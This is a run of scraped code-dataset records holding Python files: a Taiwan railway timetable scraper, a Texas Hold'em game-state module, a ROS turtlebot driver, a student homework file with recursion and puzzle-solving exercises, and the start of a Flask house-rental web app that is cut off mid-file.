self.input_str[0] in station_names[i]:\r\n str_from_station_name = value\r\n if self.input_str[1] in station_names[i]:\r\n str_to_station_name = value\r\n\r\n if str_from_station_name == '' or str_to_station_name == '':\r\n print(\"no from station or no to station\\nfrom station:\" + str_from_station_name +\r\n \", to station:\" + str_to_station_name)\r\n return ''\r\n\r\n date = self.input_str[2].strftime('%Y-%m-%d')\r\n hour = self.input_str[2].strftime('%H')\r\n minute = \"00\"\r\n time = hour + minute\r\n\r\n form_data = {\r\n 'FromStationName': str_from_station_name,\r\n 'ToStationName': str_to_station_name,\r\n 'TrainClass': '2',\r\n 'searchdate': date,\r\n 'FromTimeSelect': time,\r\n 'ToTimeSelect': '2359',\r\n 'Timetype': '1'\r\n }\r\n\r\n search_url = \"http://twtraffic.tra.gov.tw/twrail/TW_SearchResult.aspx\"\r\n post_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\"}\r\n try:\r\n resp = requests.post(search_url, data=form_data, headers=post_headers)\r\n resp.encoding = 'utf-8'\r\n soup = BeautifulSoup(resp.text, 'html.parser')\r\n except BaseException as e:\r\n print(\"Exception at train post, \" + str(e))\r\n return ''\r\n\r\n rows = soup.find_all('script')\r\n train_data = []\r\n for row in rows:\r\n train_data.append(row.text)\r\n\r\n if len(train_data) < 12:\r\n print(\"The length of train_date is less than 12\")\r\n return ''\r\n text = json.loads(train_data[11].rstrip(\";\").lstrip(\"var JSONData=\"))\r\n return_str = \"台灣鐵路 [{}] 到 [{}] 班次資訊:\\n\".format(self.input_str[0], self.input_str[1])\r\n return_str += \"車次 開車時間 到達時間\\n\"\r\n for i in range(len(text)):\r\n if i > 4:\r\n break\r\n return_str += \"{:>4} {:>10} {:>12}\\n\".format(\r\n text[i]['Train_Code'], text[i]['From_Departure_Time'], text[i]['To_Arrival_Time'])\r\n #print(return_str)\r\n return return_str\r\n","sub_path":"train_crawler.py","file_name":"train_crawler.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"311423089","text":"#!/bin/python\n#coding:utf-8\nimport roomai.common\nimport copy\n\nclass TexasHoldemPublicState(roomai.common.AbstractPublicState):\n '''\n The public state of TexasHoldem\n '''\n def __init__(self):\n self.__stage__ = None\n self.__num_players__ = None\n self.__dealer_id__ = None\n self.__public_cards__ = None\n self.__big_blind_bet__ = None\n\n #state of players\n self.__is_fold__ = None\n self.__num_fold__ = None\n self.__is_allin__ = None\n self.__num_allin__ = None\n self.__is_needed_to_action__ = None\n self.__num_needed_to_action__ = None\n\n\n #chips is array which contains the chips of all players\n self.__chips__ = None\n\n #bets is array which contains the bets from all players\n self.__bets__ = None\n\n #max_bet = max(self.bets)\n self.__max_bet_sofar__ = None\n #the raise acount\n self.__raise_account__ = None\n\n def __get_num_players__(self): return self.__num_players__\n num_players = property(__get_num_players__, doc = \"The number of players in this game\")\n\n def __get_max_bet_sofar__(self): return self.__max_bet_sofar__\n max_bet_sofar = property(__get_max_bet_sofar__, doc=\"The max bet used by one player so far\")\n\n def __get_raise_account__(self): return self.__raise_account__\n raise_account = property(__get_raise_account__, doc=\"The raise account. If a player want to raise, the price must be max_bet_sofar + raise_account * N. The raise account will increases as the game goes forward\")\n\n def __get_chips__(self):\n if self.__chips__ is None:\n return None\n else:\n return tuple(self.__chips__)\n chips = property(__get_chips__, doc = \"chips is an array of the chips of all players. For example, chips=[50,50,50]\")\n\n def __get_bets__(self):\n if self.__bets__ is None:\n return None\n else:\n return tuple(self.__bets__)\n bets = property(__get_bets__, doc = \"bets is an array which contains the bets from all players. For example, bets=[50,25,25]\")\n\n def __get_big_blind_bet__(self): return self.__big_blind_bet__\n big_blind_bet = property(__get_big_blind_bet__, doc=\"The big blind bet\")\n\n def __get_is_fold__(self):\n if self.__is_fold__ is None: return None\n else: return tuple(self.__is_fold__)\n is_fold = property(__get_is_fold__, doc=\"is_fold is an array of which player has take the fold action. For example, is_fold = [true,true,false] denotes the player0 and player1 have taken the fold action\")\n\n def __get_num_fold__(self):\n return self.__num_fold__\n num_fold = property(__get_num_fold__, doc = \"The number of players who has taken the fold action\")\n\n def __get_is_allin__(self):\n if self.__is_allin__ is None: return None\n else: return tuple(self.__is_allin__)\n is_allin = property(__get_is_allin__, doc=\"is_allin is an array of which player has take the allin action. For example, is_allin = [true,true,false] denotes the player0 and player1 have taken the allin action\")\n\n def __get_num_allin__(self):\n return self.__num_allin__\n num_allin = property(__get_num_allin__, doc = \"The number of players who has taken the allin action\")\n\n\n def __get_is_needed_to_action__(self):\n if self.__is_needed_to_action__ is None: return None\n else: return tuple(self.__is_needed_to_action__)\n is_needed_to_action = property(__get_is_needed_to_action__, doc=\"is_needed_to_action is an array of which player has take the needed_to_action action. For example, is_needed_to_action = [true,true,false] denotes the player0 and player1 have taken the needed_to_action action\")\n\n def __get_num_needed_to_action__(self):\n return self.__num_needed_to_action__\n num_needed_to_action = property(__get_num_needed_to_action__, doc = \"The number of players who has taken the needed_to_action action\")\n\n def __get_public_cards__(self):\n if self.__public_cards__ is None:\n return None\n else:\n return tuple(self.__public_cards__)\n public_cards = property(__get_public_cards__, doc=\"The public cards of this game. For example, public_cards = [roomai.common.PokerCards.lookup(\\\"A_Spade\\\"), roomai.common.PokerCards.lookup(\\\"A_Heart\\\")]\")\n\n def __get_stage__(self):\n return self.__stage__\n stage = property(__get_stage__, doc=\"stage in [1,2,3,4]\")\n\n\n def __get_dealer_id__(self): return self.__dealer_id__\n dealer_id = property(__get_dealer_id__, doc=\"The player id of the dealer. The next player after the dealer is the small blind. The next player after the small blind is the big blind.\")\n\n\n def __deepcopy__(self, memodict={}, newinstance = None):\n if newinstance is None:\n newinstance = TexasHoldemPublicState()\n newinstance.stage = self.stage\n newinstance.num_players = self.num_players\n newinstance.dealer_id = self.dealer_id\n newinstance.big_blind_bet = self.big_blind_bet\n\n if self.public_cards is None:\n newinstance.public_cards = None\n else:\n newinstance.public_cards = [self.public_cards[i].__deepcopy__() for i in range(len(self.public_cards))]\n\n\n ######## quit, allin , needed_to_action\n copy.num_quit = self.num_quit\n if self.is_fold is None:\n newinstance.is_fold = None\n else:\n newinstance.is_fold = [self.is_fold[i] for i in range(len(self.is_fold))]\n\n newinstance.num_allin = self.num_allin\n if self.is_allin is None:\n newinstance.is_allin = None\n else:\n newinstance.is_allin = [self.is_allin[i] for i in range(len(self.is_allin))]\n\n newinstance.num_needed_to_action = self.num_needed_to_action\n if self.is_needed_to_action is None:\n newinstance.is_needed_to_action = None\n else:\n newinstance.is_needed_to_action = [self.is_needed_to_action[i] for i in\n range(len(self.is_needed_to_action))]\n\n # chips is array which contains the chips of all players\n if self.chips is None:\n newinstance.chips = None\n else:\n newinstance.chips = [self.chips[i] for i in range(len(self.chips))]\n\n # bets is array which contains the bets from all players\n if self.bets is None:\n newinstance.bets = None\n else:\n newinstance.bets = [self.bets[i] for i in range(len(self.bets))]\n\n newinstance.max_bet_sofar = self.max_bet_sofar\n newinstance.raise_account = self.raise_account\n newinstance.turn = self.turn\n\n newinstance.previous_id = self.previous_id\n if self.previous_action is None:\n newinstance.previous_action = None\n else:\n newinstance.previous_action = self.previous_action.__deepcopy__()\n\n ### isterminal, scores\n newinstance.is_terminal = self.is_terminal\n if self.scores is None:\n newinstance.scores = None\n else:\n newinstance.scores = [self.scores[i] for i in range(len(self.scores))]\n\n return newinstance\n\n\nclass TexasHoldemPrivateState(roomai.common.AbstractPrivateState):\n '''\n The private state of TexasHoldem\n '''\n __keep_cards__ = []\n\n def __get_keep_cards__(self): return tuple(self.__keep_cards__)\n keep_cards = property(__get_keep_cards__, doc=\"the keep cards\")\n\n\n def __deepcopy__(self, memodict={}, newinstance = None):\n if newinstance is None:\n newinstance = TexasHoldemPrivateState()\n if self.keep_cards is None:\n newinstance.__keep_cards__ = None\n else:\n newinstance.__keep_cards__ = [self.keep_cards[i].__deepcopy__() for i in range(len(self.keep_cards))]\n return newinstance\n\n\nclass TexasHoldemPersonState(roomai.common.AbstractPersonState):\n\n\n def __init__(self):\n super(TexasHoldemPersonState, self).__init__()\n self.__hand_cards__ = []\n\n def __get_hand_cards__(self): return tuple(self.__hand_cards__)\n hand_cards = property(__get_hand_cards__, doc=\"The hand cards of the corresponding player. It contains two poker cards. For example, hand_cards=[roomai.coomon.PokerCard.lookup(\\\"A_Spade\\\"),roomai.coomon.PokerCard.lookup(\\\"A_Heart\\\")]\")\n\n def __deepcopy__(self, memodict={}, newinstance = None):\n if newinstance is None:\n newinstance = TexasHoldemPersonState()\n newinstance = super(TexasHoldemPersonState, self).__deepcopy__(newinstance=newinstance)\n newinstance.__hand_cards__ = [c.__deepcopy__() for c in self.hand_cards]\n return newinstance\n\n\n\nAllCardsPattern = dict()\n#0 1 2 3 4 5 6\n#name, isStraight, isPair, isSameSuit, [SizeOfPair1, SizeOfPair2,..](desc), rank, cards\nAllCardsPattern[\"Straight_SameSuit\"] = \\\n[\"Straight_SameSuit\", True, False, True, [], 100]\nAllCardsPattern[\"4_1\"] = \\\n[\"4_1\", False, True, False, [4,1], 98]\nAllCardsPattern[\"3_2\"] = \\\n[\"3_2\", False, True, False, [3,2], 97]\nAllCardsPattern[\"SameSuit\"] = \\\n[\"SameSuit\", False, False, True, [], 96]\nAllCardsPattern[\"Straight_DiffSuit\"] = \\\n[\"Straight_DiffSuit\", True, False, False, [], 95]\nAllCardsPattern[\"3_1_1\"] = \\\n[\"3_1_1\", False, True, False, [3,1,1], 94]\nAllCardsPattern[\"2_2_1\"] = \\\n[\"2_2_1\", False, True, False, [2,2,1], 93]\nAllCardsPattern[\"2_1_1_1\"] = \\\n[\"2_1_1_1\", False, True, False, [2,1,1,1], 92]\nAllCardsPattern[\"1_1_1_1_1\"] = \\\n[\"1_1_1_1_1\", False, True, False, [1,1,1,1,1],91]","sub_path":"roomai/texas/TexasHoldemInfo.py","file_name":"TexasHoldemInfo.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"526835977","text":"#!/usr/bin/env python\nfrom turtlebot_drive import Turtlebot3_drive\nimport rospy\nimport random\n\nclass drive(Turtlebot3_drive):\n\n def __init__(self, team):\n super(drive, self).__init__(team)\n\n def logic(self):\n if self.initial:\n self.initial = False\n return \"walk\"\n '''\n This TTB will random opertaion from choice. But if operation is \"run\", it will run for 5 steps then random new operation\n '''\n operation_choice = [\"run\",\"stop\",\"turn left\",\"turn right\"]\n\n operation = random.choice(operation_choice)\n\n is_moving = self.mem[0]\n\n center_dist = self.top_center_sensor - self.bottom_center_sensor\n\n if center_dist < 0.1:\n if self.current_vel != 0:\n return \"stop\"\n else:\n return \"turn right\"\n\n if is_moving < 5: # TTB runs 5 steps \n is_moving += 1\n self.mem[0] += 1\n return \"run\"\n else:\n is_moving = 0\n self.mem[0] = 0\n return operation\n\nif __name__ == '__main__':\n rospy.init_node('drive', anonymous=True)\n rate = rospy.Rate(10)\n try:\n ttb = drive(\"red\")\n while not rospy.is_shutdown():\n ttb.controlLoop()\n rate.sleep()\n except rospy.ROSInterruptException:\n ttb.updatecommandVelocity(0.0, 0.0)\n","sub_path":"turtlebot3_simulations/turtlebot3_gazebo/src/py/ttb6.py","file_name":"ttb6.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"126169556","text":"import fileinput\nimport os\nimport re\n\n# read from initial file\ntext = open('redach.txt', 'r').read()\n\n# split text on sent\nsentences = re.split(r' *(? largestSize:\n largestFile = curFile\n largestSize = curSize\n \n if largestSize == -1: #if there are no files, '' is returned\n return '' \n return largestFile\n \n\n\n#evaluate the value of a legal arithmetic expression in prefix notation\ndef evalPrefixNotation(L): \n return evalPrefixNotationHelper(L, [])\n\n\ndef stri(a, b):\n result = 0\n while(result < len(a) and result < len(b)):\n if (a[result] != b[result]):\n print(result)\n return result\n else:\n result += 1\n print(result)\n return result;\n\ndef evalPrefixNotationHelper(L, numbers):\n\n if len(L) == 0: return numbers[0] \n\n elif len(L) == 1 and type(L[0]) == int: return L.pop()\n\n operator = L.pop() #start with the last elem and work backwards\n if type(operator) == int:\n numbers.append(operator) #store operands in a list\n return evalPrefixNotationHelper(L, numbers)\n elif operator in ['+', '-', '*']:\n numbers.append(eval(str(numbers.pop()) + operator + str(numbers.pop())))\n # remove operands from list that has been calculated and put the newly \n # calculated num into the list\n\n return evalPrefixNotationHelper(L, numbers)\n else:\n raise Exception('Unknown operator: ' + operator)\n\nclass State(object):\n def __eq__(self, other): return ((other != None) \n and (self.__dict__ == other.__dict__))\n def __hash__(self): return hash(str(self.__dict__)) \n def __repr__(self): return str(self.__dict__)\n\nclass BacktrackingPuzzleSolver(object):\n def solve(self, checkConstraints=True, printReport=False):\n self.moves = [ ]\n self.states = set()\n # If checkConstraints is False, then do not check the backtracking\n # constraints as we go (so instead do an exhaustive search)\n self.checkConstraints = checkConstraints\n # Be sure to set self.startArgs and self.startState in __init__\n self.startTime = time.time()\n self.solutionState = self.solveFromState(self.startState)\n self.endTime = time.time()\n if (printReport): self.printReport()\n return (self.moves, self.solutionState)\n\n def printReport(self):\n print()\n print('***********************************')\n argsStr = str(self.startArgs).replace(',)',')') # remove singleton comma\n print(f'Report for {self.__class__.__name__}{argsStr}')\n print('checkConstraints:', self.checkConstraints)\n print('Moves:', self.moves)\n print('Solution state: ', end='')\n if ('\\n' in str(self.solutionState)): print()\n print(self.solutionState)\n print('------------')\n print('Total states:', len(self.states))\n print('Total moves: ', len(self.moves))\n millis = int((self.endTime - self.startTime)*1000)\n print('Total time: ', millis, 'ms')\n print('***********************************')\n\n def solveFromState(self, state):\n if state in self.states:\n # we have already seen this state, so skip it\n return None\n self.states.add(state)\n if self.isSolutionState(state):\n # we found a solution, so return it!\n return state\n else:\n for move in self.getLegalMoves(state):\n # 1. Apply the move\n childState = self.doMove(state, move)\n # 2. Verify the move satisfies the backtracking constraints\n # (only proceed if so)\n if ((self.stateSatisfiesConstraints(childState)) or\n (not self.checkConstraints)):\n # 3. Add the move to our solution path (self.moves)\n self.moves.append(move)\n # 4. Try to recursively solve from this new state\n result = self.solveFromState(childState)\n # 5. If we solved it, then return the solution!\n if result != None:\n return result\n # 6. Else we did not solve it, so backtrack and\n # remove the move from the solution path (self.moves)\n self.moves.pop()\n return None\n\n # You have to implement these:\n\nclass ABCStateSolver(BacktrackingPuzzleSolver):\n\n def __init__(self, constraints, aLocation):\n\n self.constraints = constraints\n self.aLocation = aLocation\n self.startArgs = (constraints, aLocation)\n self.startState = ABCState([aLocation])\n\n self.size = 5 # length of col/row\n self.movesMap = self.getMovesMap(constraints) \n self.alphabets = list(string.ascii_uppercase) \n\n '''\n crates a dictionary that stores all possible moves a letter can be placed\n ignoring the constraints\n '''\n def getMovesMap(self, constraints):\n movesMap = dict()\n lengthConstraints = len(constraints)\n colNum = self.size\n rowNum = self.size\n\n self.getCol(movesMap, colNum, rowNum, constraints)\n self.getRow(movesMap, rowNum, colNum, constraints)\n self.getDiagnol(movesMap, rowNum, colNum, constraints)\n\n return movesMap\n\n '''\n store values of the letter on the same col in dict movesMap\n '''\n def getCol(self, movesMap, rowNum, colNum, constraints):\n\n for c in range(colNum):\n index0, index1 = c+1, (len(constraints)-1-self.size-1-c)\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for r in range(rowNum):\n movesSet.add((r, c))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n \n '''\n store values of the letter on the same row in dict movesMap\n '''\n def getRow(self, movesMap, rowNum, colNum, constraints):\n\n for r in range(rowNum):\n index0, index1 = colNum+1+r+1, len(constraints)-1-r\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for c in range(colNum):\n movesSet.add((r, c))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n \n '''\n store values of the letter on the same diagnol in dict movesMap\n '''\n def getDiagnol(self, movesMap, rowNum, colNum, constraints):\n\n #top-left and bottom-right diag \n for c in range(colNum):\n index0, index1 = 0, 2*colNum + 1 + 1\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for pos in range(rowNum): movesSet.add((pos, pos))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n\n #top-right and bottom-left diag\n for c in range(colNum):\n index0, index1 = len(constraints)-1-rowNum, colNum + 1\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for pos in range(rowNum): movesSet.add((pos, colNum-1-pos))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n\n\n def stateSatisfiesConstraints(self, state):\n row1, col1 = state.letterLocationsList[-1]\n row2, col2 = state.letterLocationsList[-2]\n\n #check if the current letter is around the prev letter\n return abs(row1-row2)<=1 and abs(col1-col2)<=1\n\n def isSolutionState(self, state):\n resultLength = len(self.constraints)+1 #length of constraints + A\n return resultLength == len(state.letterLocationsList)\n\n def getLegalMoves(self, state):\n nextIndex = len(state.letterLocationsList) #next elem index in list\n char = self.alphabets[nextIndex] \n legalMoves = []\n \n for move in (self.movesMap[char]):\n if not(move in state.letterLocationsList): #add unused position\n legalMoves += [move]\n return legalMoves\n\n '''\n return a new state that results from applying the given\n move to the given state\n '''\n def doMove(self, state, move):\n newLetterLocationList = state.letterLocationsList + [move]\n return ABCState(newLetterLocationList)\n\nclass ABCState(State):\n \n def __init__(self, letterLocationsList):\n\n self.letterLocationsList = letterLocationsList\n self.size = 5\n\n def getBoard(self):\n alphaList = list(string.ascii_uppercase)\n board = [['-']*self.size for i in range(self.size)]\n\n for index in range(len(self.letterLocationsList)):\n r, c = self.letterLocationsList[index]\n board[r][c] = alphaList[index]\n \n return board\n\ndef solveABC(constraints, aLocation):\n move, solutionState = ABCStateSolver(constraints, aLocation).solve()\n if solutionState == None:\n return None\n else:\n return solutionState.getBoard()\n \n\n\ndef flatten(L):\n # This is bonus!\n return 42\n\n################################################\n# ignore_rest: place all your graphics and tests below here!\n################################################\n\nfrom cmu_112_graphics import *\nfrom tkinter import *\n\n\nclass FreddyFractalViewer(App):\n\n def appStarted(self):\n self.level = 1\n scale = 7\n self.r = min(self.width/scale, self.height/scale)\n self.cx = self.width/2\n self.cy = self.height/2\n\n def keyPressed(self, event): \n if event.key in ['Up', 'Right']: \n self.level += 1\n elif event.key in ['Down', 'Right'] and self.level>0:\n self.level -= 1\n\n def drawFacialFeatures(self, canvas, cx, cy, r):\n\n self.drawMouthCirc(canvas, cx, cy, r)\n self.drawNose(canvas, cx, cy, r)\n self.drawEyes(canvas, cx, cy, r)\n self.drawMouth(canvas, cx, cy, r)\n \n def drawMouthCirc(self, canvas, cx, cy, r):\n #draw mouth circ\n scale2 = 2\n sclae3 = 3\n scale15 = 15\n\n radius = r//scale2\n centerX = cx\n centerY = cy + r//sclae3\n canvas.create_oval(centerX-radius, centerY-radius, \n centerX+radius, centerY + radius, fill = 'tan', width = r//scale15)\n\n def drawNose(self, canvas, cx, cy, r):\n #draw nose \n scale2 = 2\n scale3 = 3\n\n centerX = cx\n centerY = cy + r//scale3\n radius = r//scale2\n noseR = radius//scale3\n noseX = centerX\n noseY = centerY - radius//scale2\n canvas.create_oval(noseX-noseR, noseY-noseR, noseX+noseR, noseY+noseR, \n fill = 'black')\n\n def drawMouth(self, canvas, cx, cy, r):\n #draw mouth\n scale3 = 3\n scale4 = 4\n scale5 = 5\n\n leftLipX, midLipX, rightLipX = cx - r / scale4, cx, cx + r / scale4\n topLipY, bottomLipY = cy + r / scale4, cy + scale3*r/scale5\n lipWid = r//13\n\n canvas.create_arc(leftLipX, topLipY,\n midLipX, bottomLipY,\n fill=\"black\", start=180, extent=180,\n style=ARC, width=lipWid)\n\n canvas.create_arc(midLipX, topLipY,\n rightLipX, bottomLipY,\n fill=\"black\", start=180, extent=180,\n style=ARC, width=lipWid)\n \n def drawEyes(self, canvas, cx, cy, r):\n #draw eyes\n\n scale3 = 3\n eyesR1 = r//scale3\n eyesX1, eyesY1 = cx-eyesR1, cy-eyesR1\n eyesX2, eyesY2 = cx + eyesR1, cy - eyesR1\n eyesR2 = r//6\n\n canvas.create_oval(eyesX1-eyesR2, eyesY1-eyesR2, eyesX1+eyesR2, \n eyesY1+eyesR2, fill = 'black')\n canvas.create_oval(eyesX2-eyesR2, eyesY2-eyesR2, eyesX2+eyesR2, \n eyesY2+eyesR2, fill = 'black')\n\n def teddyFace(self, canvas, cx, cy, r):\n scale15 = 15\n canvas.create_oval(cx-r, cy-r, cx+r, cy+r, fill = 'brown', \n width = r//15) #draw face\n self.drawFacialFeatures(canvas, cx, cy, r) #draw facial features\n\n '''\n draw n level of Freddies using recursion\n '''\n def fractalFreddy(self, canvas, cx, cy, r, level):\n \n if level == 0:\n return \n elif level == 1:\n self.teddyFace(canvas, cx, cy, r)\n else:\n scale = 1.5\n angle = 45\n scale2 = 2\n dx = scale*r*math.cos(math.radians(angle))\n dy = scale*r*math.sin(math.radians(angle))\n self.fractalFreddy(canvas, cx-dx, cy-dy, r//scale2, level-1)\n self.fractalFreddy(canvas, cx+dx, cy-dy, r//scale2, level-1)\n self.teddyFace(canvas, cx, cy, r)\n \n\n def redrawAll(self, canvas):\n self.fractalFreddy(canvas, self.cx, self.cy, self.r, self.level)\n\ndef runFreddyFractalViewer():\n FreddyFractalViewer(width=1000, height=1000)\n\n#################################################\n# Test Functions\n#################################################\n\ndef testConfirmPolicies():\n print('Testing confirmPolicies()...', end='')\n truePolicies = [ \n 'I can work solo on hw11',\n 'I can work with one partner on hw11',\n (\"I must list my hw11 partner's name and andrewId at the top\" +\n \"of my hw11.py file that I submit\"),\n 'My hw11 partner must be in 112 this semester',\n \"I can look at my hw11 partner's code\",\n \"I can help my hw11 partner debug their code\",\n ]\n falsePolicies = [\n 'I can switch hw11 partners and then work with a new partner',\n 'My hw11 partner must be in the same lecture or section as me',\n \"I can copy some of hw11 partner's code\",\n \"I can electronically transfer some of my code to my hw11 partner\",\n (\"I can tell my hw11 partner line-by-line, character-by-character \" +\n \"what to type so their code is nearly-identical to mine.\"),\n ]\n policies = confirmPolicies()\n # True policies:\n for policy in truePolicies:\n assert(policies[policy] == True)\n # False policies (the opposite of these are actually policies)\n for policy in falsePolicies:\n assert(policies[policy] == False)\n print('Passed!')\n\ndef testFindLargestFile():\n print('Testing findLargestFile()...', end='')\n assert(findLargestFile('sampleFiles/folderA') ==\n 'sampleFiles/folderA/folderC/giftwrap.txt')\n assert(findLargestFile('sampleFiles/folderB') ==\n 'sampleFiles/folderB/folderH/driving.txt')\n assert(findLargestFile('sampleFiles/folderB/folderF') == '')\n print('Passed!')\n\ndef testEvalPrefixNotation():\n print('Testing evalPrefixNotation()...', end='')\n assert(evalPrefixNotation([42]) == 42)\n assert(evalPrefixNotation(['+', 3, 4]) == 7)\n assert(evalPrefixNotation(['-', 3, 4]) == -1)\n assert(evalPrefixNotation(['-', 4, 3]) == 1)\n assert(evalPrefixNotation(['+', 3, '*', 4, 5]) == 23)\n assert(evalPrefixNotation(['+', '*', 2, 3, '*', 4, 5]) == 26)\n assert(evalPrefixNotation(['*', '+', 2, 3, '+', 4, 5]) == 45)\n assert(evalPrefixNotation(['*', '+', 2, '*', 3, '-', 8, 7,\n '+', '*', 2, 2, 5]) == 45)\n \n raisedAnError = False\n try:\n evalPrefixNotation(['^', 2, 3])\n except:\n raisedAnError = True\n assert(raisedAnError == True)\n print('Passed.')\n\ndef testSolveABC():\n print('Testing solveABC()...', end='')\n constraints = 'CHJXBOVLFNURGPEKWTSQDYMI'\n aLocation = (0,4)\n board = solveABC(constraints, aLocation)\n solution = [['I', 'J', 'K', 'L', 'A'],\n ['H', 'G', 'F', 'B', 'M'],\n ['T', 'Y', 'C', 'E', 'N'],\n ['U', 'S', 'X', 'D', 'O'],\n ['V', 'W', 'R', 'Q', 'P']\n ]\n assert(board == solution)\n\n constraints = 'TXYNFEJOQCHIMBDSUWPGKLRV'\n aLocation = (2,4)\n board = solveABC(constraints, aLocation)\n solution = [['V', 'U', 'S', 'O', 'P'],\n ['W', 'T', 'N', 'R', 'Q'],\n ['X', 'L', 'M', 'C', 'A'],\n ['K', 'Y', 'H', 'D', 'B'],\n ['J', 'I', 'G', 'F', 'E'],\n ]\n assert(board == solution)\n\n constraints = 'TXYNFEJOQCHIMBDSUPWGKLRV' # swapped P and W\n aLocation = (2,4)\n board = solveABC(constraints, aLocation)\n solution = None\n assert(board == solution)\n print('Passed!')\n\ndef testFlatten():\n print('Testing bonus flatten()...', end='')\n assert(flatten([1,[2]]) == [1,2])\n assert(flatten([1,2,[3,[4,5],6],7]) == [1,2,3,4,5,6,7])\n assert(flatten(['wow', [2,[[]]], [True]]) == ['wow', 2, True])\n assert(flatten([]) == [])\n assert(flatten([[]]) == [])\n assert(flatten(3) == 3)\n print('Passed!')\n\n#################################################\n# testAll and main\n#################################################\n\ndef testAll():\n #testConfirmPolicies()\n #testFindLargestFile()\n #testEvalPrefixNotation()\n #testSolveABC()\n #runFreddyFractalViewer()\n stri(\"abc\", \"abcd\")\n #testFlatten() # bonus\n\ndef main():\n cs112_f19_week11_linter.lint()\n testAll()\n\nif (__name__ == '__main__'):\n main()\n","sub_path":"hw11.py","file_name":"hw11.py","file_ext":"py","file_size_in_byte":20261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"631497678","text":"import os\r\nfrom flask import Blueprint,render_template,url_for,session,request,redirect,jsonify\r\nfrom App.models import Area,Facility,House,db,HouseImage,User,Order\r\nfrom utils import status_code\r\nfrom utils.functions import is_login\r\nfrom utils.setting import UPLOAD_DIR\r\nhouse_blueprint = Blueprint('house',__name__)\r\n\r\n@house_blueprint.route('/myhouse/',methods=['GET'])\r\n@is_login\r\ndef my_house():\r\n return render_template('myhouse.html')\r\n\r\n@house_blueprint.route('/newhouse/',methods=['GET'])\r\n@is_login\r\ndef new_house():\r\n return render_template('newhouse.html')\r\n\r\n@house_blueprint.route('/area_facility/',methods=['GET'])\r\ndef area_facility():\r\n areas = Area.query.all()\r\n facilitys = Facility.query.all()\r\n areas_list = [area.to_dict() for area in areas]\r\n facilitys_list = [facility.to_dict() for facility in facilitys]\r\n return jsonify(code=status_code.MSG_OK,areas_list=areas_list,facilitys_list=facilitys_list)\r\n\r\n@house_blueprint.route('/newhouse/',methods=['POST'])\r\ndef user_new_house():\r\n data = request.form.to_dict()\r\n facility_list = request.form.getlist('facility')\r\n house = House()\r\n house.user_id = session['user_id']\r\n house.title = data.get('title')\r\n house.price = data.get('price')\r\n house.area_id = data.get('area_id')\r\n house.address = data.get('address')\r\n house.room_count = data.get('room_count')\r\n house.acreage = data.get('acreage')\r\n house.unit = data.get('unit')\r\n house.capacity = data.get('capacity')\r\n house.beds = data.get('beds')\r\n house.deposit = data.get('deposit')\r\n house.min_days = data.get('min_days')\r\n house.max_days = data.get('max_days')\r\n house_facility = Facility.query.filter(Facility.id.in_(facility_list)).all()\r\n house.facilities = house_facility\r\n try:\r\n house.add_update()\r\n except Exception as e:\r\n db.session.rollback()\r\n return jsonify(status_code.DATABASE_ERROR)\r\n return jsonify(code=status_code.MSG_OK,house_id=house.id)\r\n\r\n@house_blueprint.route('/upload_img/',methods=['PATCH'])\r\ndef upload_img():\r\n house_id = request.form.get('house_id')\r\n image = request.files.get('house_image')\r\n img_url = os.path.join('upload',image.filename)\r\n image_url = os.path.join(UPLOAD_DIR,image.filename)\r\n image.save(image_url)\r\n\r\n h_image = HouseImage()\r\n h_image.house_id = house_id\r\n h_image.url = os.path.join('upload',image.filename)\r\n house = House.query.get(house_id)\r\n if not house.index_image_url:\r\n house.index_image_url = img_url\r\n try:\r\n h_image.add_update()\r\n except Exception as e:\r\n db.session.rollback()\r\n return jsonify(status_code.DATABASE_ERROR)\r\n return jsonify(code=status_code.MSG_OK,image_url=img_url)\r\n\r\n\r\n@house_blueprint.route('/house_list/',methods=['GET'])\r\n@is_login\r\ndef house_list():\r\n user_id = session['user_id']\r\n house_lists = House.query.filter_by(user_id=user_id).all()\r\n h_lists = [house_list.to_dict() for house_list in house_lists]\r\n return jsonify(code=status_code.MSG_OK,h_lists=h_lists)\r\n\r\n@house_blueprint.route('/detail/',methods=['GET'])\r\ndef detail():\r\n return render_template('detail.html')\r\n\r\n@house_blueprint.route('/detail//',methods=['GET'])\r\ndef house_detail(id):\r\n house = House.query.get(id)\r\n if session['user_id'] == house.user_id:\r\n house_info = house.to_full_dict()\r\n return jsonify(code = {'code':401},house_info=house_info)\r\n else:\r\n house_info = house.to_full_dict()\r\n return jsonify(code = status_code.MSG_OK,house_info=house_info)\r\n\r\n@house_blueprint.route('/booking/',methods=['GET'])\r\ndef booking():\r\n return render_template('booking.html')\r\n\r\n@house_blueprint.route('/index/',methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@house_blueprint.route('/hindex/',methods=['GET'])\r\ndef hindex():\r\n username = ''\r\n if 'user_id' in session:\r\n user = User.query.get(session['user_id'])\r\n username = user.name\r\n\r\n return jsonify(code=status_code.MSG_OK,username=username)\r\n\r\n@house_blueprint.route('/index_info/')\r\ndef index_info():\r\n areas = Area.query.all()\r\n areas_list = [area.to_dict() for area in areas]\r\n houses = House.query.order_by(House.id.desc()).all()[:5]\r\n houses_info = [house.to_dict() for house in houses]\r\n return jsonify(code=status_code.MSG_OK, areas_list=areas_list,houses_info=houses_info)\r\n\r\n@house_blueprint.route('/search/',methods=['GET'])\r\ndef search():\r\n return 